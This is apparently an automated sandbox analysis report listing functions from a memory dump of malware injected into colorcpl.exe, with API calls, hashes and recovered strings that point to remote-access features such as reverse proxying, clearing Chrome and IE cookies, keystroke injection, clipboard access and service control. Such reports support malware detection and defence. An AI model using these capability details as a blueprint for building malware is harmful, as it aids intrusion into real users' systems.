                                                              • Opcode ID: c8c67cccc05f2cc965824a73764230bb0a512dc1956b192854becd5b0cfef3bf
                                                              • Instruction ID: c6a3709b525b134e6ccba09f0c6578816df9d1393d7186ff440844a7c6c7f650
                                                              • Instruction Fuzzy Hash: 7C012775A01288FBD710EBE5F908E9F7BBCAB89B05F00002AF115A6085D7FD50458B60
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6c00e23a5c8888094fd5ebe535572d8408c38c14bc3cacc995a7ae6410e6ff3
                                                              • Instruction ID: 6965c2e42c91f7a930872383961b8e60465982ebcde3543a89654386360d1b1d
                                                              • Instruction Fuzzy Hash: 7CC1AB78B06389AFCB51DFADD840BEDBBF4AF4A310F084188E855AB381C7359951CB61
                                                              APIs
                                                                • Part of subcall function 030E2A89: CreateFileW.KERNEL32(00000000,00000000,?,030E2E64,?,?,00000000,?,030E2E64,00000000,0000000C), ref: 030E2AA6
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 030E2ECF
                                                              • __dosmaperr.LIBCMT ref: 030E2ED6
                                                              • GetFileType.KERNEL32(00000000), ref: 030E2EE2
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 030E2EEC
                                                              • __dosmaperr.LIBCMT ref: 030E2EF5
                                                              • CloseHandle.KERNEL32(00000000), ref: 030E2F15
                                                              • CloseHandle.KERNEL32(00000000), ref: 030E305F
                                                              • GetLastError.KERNEL32 ref: 030E3091
                                                              • __dosmaperr.LIBCMT ref: 030E3098
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID:
                                                              • API String ID: 4237864984-0
                                                              • Opcode ID: 81247aad67036b345f845614d4d4f6be72d87d2c36324c39b061c17aaf794f51
                                                              • Instruction ID: 2c7d1b9622e087e3456a25503186cf00c7ece05d01fd624ec51a85b4d6c0edb8
                                                              • Instruction Fuzzy Hash: 8BA13536B112498FDF19EF68D8517EE7BE8EB4A320F18019DE8129F390DB358812C751
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,030E123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 030E100F
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,030E123C,00000000,00000000,?,00000001,?,?,?,?), ref: 030E1092
                                                              • __alloca_probe_16.LIBCMT ref: 030E10CA
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,030E123C,?,030E123C,00000000,00000000,?,00000001,?,?,?,?), ref: 030E1125
                                                              • __alloca_probe_16.LIBCMT ref: 030E1174
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,030E123C,00000000,00000000,?,00000001,?,?,?,?), ref: 030E113C
                                                                • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,030E123C,00000000,00000000,?,00000001,?,?,?,?), ref: 030E11B8
                                                              • __freea.LIBCMT ref: 030E11E3
                                                              • __freea.LIBCMT ref: 030E11EF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                              • String ID:
                                                              • API String ID: 201697637-0
                                                              • Opcode ID: 412abfa2dea458e8f6268df9311f4867851977a8a70343f5a01ef84a27e48e4f
                                                              • Instruction ID: 05077c46b95687416612da7f3028ba17ece23f53c6df8bbd8fc80c0be629b469
                                                              • Instruction Fuzzy Hash: 3491D675F022569FDB28DEA9CC80EEEBBF6AF49610F0C4599E905EB140D775D840CB60
                                                              APIs
                                                                • Part of subcall function 030D5725: GetLastError.KERNEL32(?,?,030C8595,?,?,?,030C8C17,030C988A,?,03101E78), ref: 030D5729
                                                                • Part of subcall function 030D5725: _free.LIBCMT ref: 030D575C
                                                                • Part of subcall function 030D5725: SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D579D
                                                                • Part of subcall function 030D5725: _abort.LIBCMT ref: 030D57A3
                                                              • _memcmp.LIBVCRUNTIME ref: 030D2935
                                                              • _free.LIBCMT ref: 030D29A6
                                                              • _free.LIBCMT ref: 030D29BF
                                                              • _free.LIBCMT ref: 030D29F1
                                                              • _free.LIBCMT ref: 030D29FA
                                                              • _free.LIBCMT ref: 030D2A06
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                              • String ID: C
                                                              • API String ID: 1679612858-1037565863
                                                              • Opcode ID: da0182574ce698ce107c5025a5ed6d878dac7008369fb58c0df462eb9767ee46
                                                              • Instruction ID: 070dba5507debf2acf36b912e0a622a10c507576bab58c5ecb98e08628f15fc0
                                                              • Instruction Fuzzy Hash: EDB1F975A023199FDB64DF18C884AADB7F8FB48314F1489EAD949A7250E731AE90CF50
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID:
                                                              • String ID: tcp$udp
                                                              • API String ID: 0-3725065008
                                                              • Opcode ID: ffb9d28c5d7f8fb6eecbbb9d4610718e236f907b121a144b823a08b908fd09ce
                                                              • Instruction ID: d126674c25b82857720e41e228220b5acc206a4bf8cba297f30527a0e0e9286d
                                                              • Instruction Fuzzy Hash: 3271B07960AB028FD766CFEDE44562BB7E4EF84640F0848BEF88587250DB74D944CB42
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: Eventinet_ntoa
                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                              • API String ID: 3578746661-168337528
                                                              • Opcode ID: 2a7608c5c3a4ec3fe8ac6448883a15bd5b57510fb69564f2ed9c740e0427cd75
                                                              • Instruction ID: 11ff4fd713d08a40de5ac44478e39dd2167798fe37806cefad2177d9f9bc45b1
                                                              • Instruction Fuzzy Hash: 3B51D635B077099FEB08FB7CE825AAE76A5AFC1200F50091AE5418F6D5EF348905D7C2
                                                              APIs
                                                                • Part of subcall function 030A626A: __EH_prolog.LIBCMT ref: 030A626F
                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 030A60E6
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,030F3050), ref: 030A611A
                                                              • CloseHandle.KERNEL32(00000000), ref: 030A6123
                                                              • DeleteFileA.KERNEL32(00000000), ref: 030A6132
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWait
                                                              • String ID: <$@$Temp
                                                              • API String ID: 2516244461-1032778388
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,03101E78,030F2F54,?,00000000,0309708D,00000000), ref: 03096A56
                                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0309708D,00000000,?,?,0000000A,00000000), ref: 03096A9E
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,0309708D,00000000,?,?,0000000A,00000000), ref: 03096ADE
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 03096AFB
                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 03096B26
                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 03096B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreateDeleteMoveWrite
                                                              • String ID: .part
                                                              • API String ID: 1511717022-3499674018
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,030BBAB6,?,?,?,030D7215,00000001,00000001,?), ref: 030D701E
                                                              • __alloca_probe_16.LIBCMT ref: 030D7056
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,030BBAB6,?,?,?,030D7215,00000001,00000001,?), ref: 030D70A4
                                                              • __alloca_probe_16.LIBCMT ref: 030D713B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 030D719E
                                                              • __freea.LIBCMT ref: 030D71AB
                                                                • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              • __freea.LIBCMT ref: 030D71B4
                                                              • __freea.LIBCMT ref: 030D71D9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3864826663-0
                                                              APIs
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 030A7982
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 030A79A3
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 030A79C3
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 030A79D7
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 030A79ED
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 030A7A0A
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 030A7A25
                                                              • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 030A7A41
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InputSend
                                                              • String ID:
                                                              • API String ID: 3431551938-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlock
                                                              • String ID:
                                                              • API String ID: 2813074840-0
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,030D7ECC,030E3EB5,00000000,00000000,00000000,00000000,00000000), ref: 030D7799
                                                              • __fassign.LIBCMT ref: 030D7814
                                                              • __fassign.LIBCMT ref: 030D782F
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 030D7855
                                                              • WriteFile.KERNEL32(?,00000000,00000000,030D7ECC,00000000,?,?,?,?,?,?,?,?,?,030D7ECC,030E3EB5), ref: 030D7874
                                                              • WriteFile.KERNEL32(?,030E3EB5,00000001,030D7ECC,00000000,?,?,?,?,?,?,?,?,?,030D7ECC,030E3EB5), ref: 030D78AD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              APIs
                                                                • Part of subcall function 030A1F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,00000000,00000000,00000000), ref: 030A1FB5
                                                                • Part of subcall function 030A1F91: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 030A1FD2
                                                                • Part of subcall function 030A1F91: RegCloseKey.KERNEL32(00000000), ref: 030A1FDD
                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0309AEAC
                                                              • PathFileExistsA.SHLWAPI(?), ref: 0309AEB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                              • API String ID: 1133728706-4073444585
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              APIs
                                                                • Part of subcall function 030DDE21: _free.LIBCMT ref: 030DDE4A
                                                              • _free.LIBCMT ref: 030DE128
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030DE133
                                                              • _free.LIBCMT ref: 030DE13E
                                                              • _free.LIBCMT ref: 030DE192
                                                              • _free.LIBCMT ref: 030DE19D
                                                              • _free.LIBCMT ref: 030DE1A8
                                                              • _free.LIBCMT ref: 030DE1B3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,030C80F1,030C705E), ref: 030C8108
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 030C8116
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 030C812F
                                                              • SetLastError.KERNEL32(00000000,?,030C80F1,030C705E), ref: 030C8181
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0309AA1E
                                                              • GetLastError.KERNEL32 ref: 0309AA28
                                                              Strings
                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0309A9E9
                                                              • [Chrome Cookies found, cleared!], xrefs: 0309AA4E
                                                              • UserProfile, xrefs: 0309A9EE
                                                              • [Chrome Cookies not found], xrefs: 0309AA42
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                              • API String ID: 2018770650-304995407
                                                              APIs
                                                              • __allrem.LIBCMT ref: 030C8A09
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030C8A25
                                                              • __allrem.LIBCMT ref: 030C8A3C
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030C8A5A
                                                              • __allrem.LIBCMT ref: 030C8A71
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030C8A8F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __cftoe
                                                              • String ID:
                                                              • API String ID: 4189289331-0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16_free
                                                              • String ID: a/p$am/pm
                                                              • API String ID: 2936374016-3206640213
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0309F8C4
• int.LIBCPMT ref: 0309F8D7
  • Part of subcall function 0309CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0309CAFA
  • Part of subcall function 0309CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0309CB14
• std::_Facet_Register.LIBCPMT ref: 0309F917
• std::_Lockit::~_Lockit.LIBCPMT ref: 0309F920
• __CxxThrowException@8.LIBVCRUNTIME ref: 0309F93E
• __Init_thread_footer.LIBCMT ref: 0309F97F
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
• API String ID: 3815856325-0
• Opcode ID: eb63a02fc8ec0c65f6c14a7b6929dbd3a96089f7ecd424f5bf43381294bdf837
• Instruction ID: fdb8e16a7eca910b236fd8e672b2edd0b8a6b73192024de05d4b63cc041dfac6
• Opcode Fuzzy Hash: eb63a02fc8ec0c65f6c14a7b6929dbd3a96089f7ecd424f5bf43381294bdf837
• Instruction Fuzzy Hash: 7421073A912205EBDE14FBA8D5048DDB7AC9F89224B20059BE911EF290DF709E4197D0
APIs
• GetLastError.KERNEL32(?,?,030C8595,?,?,?,030C8C17,030C988A,?,03101E78), ref: 030D5729
• _free.LIBCMT ref: 030D575C
• _free.LIBCMT ref: 030D5784
• SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D5791
• SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D579D
• _abort.LIBCMT ref: 030D57A3
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• API String ID: 3160817290-0
• Opcode ID: d12686e41b112e3702be209c5dda1d1b6bfcabd7472262c42fac7bfadf88380c
• Instruction ID: 16693f63ab84e386edcc1afdddfaf16610bf718a2c6e22c3115d09b0dc16f061
• Opcode Fuzzy Hash: d12686e41b112e3702be209c5dda1d1b6bfcabd7472262c42fac7bfadf88380c
• Instruction Fuzzy Hash: 6FF02D3D243711ABC252F6387C48BAF2ADD9BC3661F390054FD19DE144EF2584018E31
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,030A8559,00000000), ref: 030A8B6F
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,030A8559,00000000), ref: 030A8B83
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A8559,00000000), ref: 030A8B90
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,030A8559,00000000), ref: 030A8B9F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A8559,00000000), ref: 030A8BB1
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A8559,00000000), ref: 030A8BB4
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• API String ID: 221034970-0
• Opcode ID: 1adba0bfe8819273286f3291fce56262ae97b57da26c7b7f38a9f9c743779ecd
• Instruction ID: be81b35fcf281cc9446be6ff24319666f96ca545c965d95197012536d71ca92f
• Opcode Fuzzy Hash: 1adba0bfe8819273286f3291fce56262ae97b57da26c7b7f38a9f9c743779ecd
• Instruction Fuzzy Hash: 5DF0C27164322C6FE610FAA4BC49EBF3BACDB96A62B000056FA099A140DB298D0595A0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8BD6
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8BEA
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8BF7
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8C06
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8C18
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8C1B
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• API String ID: 221034970-0
• Opcode ID: 921cf6a5252528673eab2984187d610012930ed01bfa5c61d1da1d5ce0689899
• Instruction ID: 06487fa8c54d56339521bf385032abdf2ae41092f0231f6ff9a158864305c4c5
• Opcode Fuzzy Hash: 921cf6a5252528673eab2984187d610012930ed01bfa5c61d1da1d5ce0689899
• Instruction Fuzzy Hash: 88F0C27164322C6FE611FB68BC49EBF3FACDB85A61B000056FA099A144DF298D0599A0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8A6B
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8A7F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8A8C
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8A9B
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8AAD
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8AB0
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• API String ID: 221034970-0
• Opcode ID: c07270d58c0b9d10c8c8891556c6fabbaa1322a31ed5ff1ae82707b0e001c982
• Instruction ID: 4394f175489d114bf2127120a92f473f0710e0df39ca6b1de769cd1f7f1b2baf
• Opcode Fuzzy Hash: c07270d58c0b9d10c8c8891556c6fabbaa1322a31ed5ff1ae82707b0e001c982
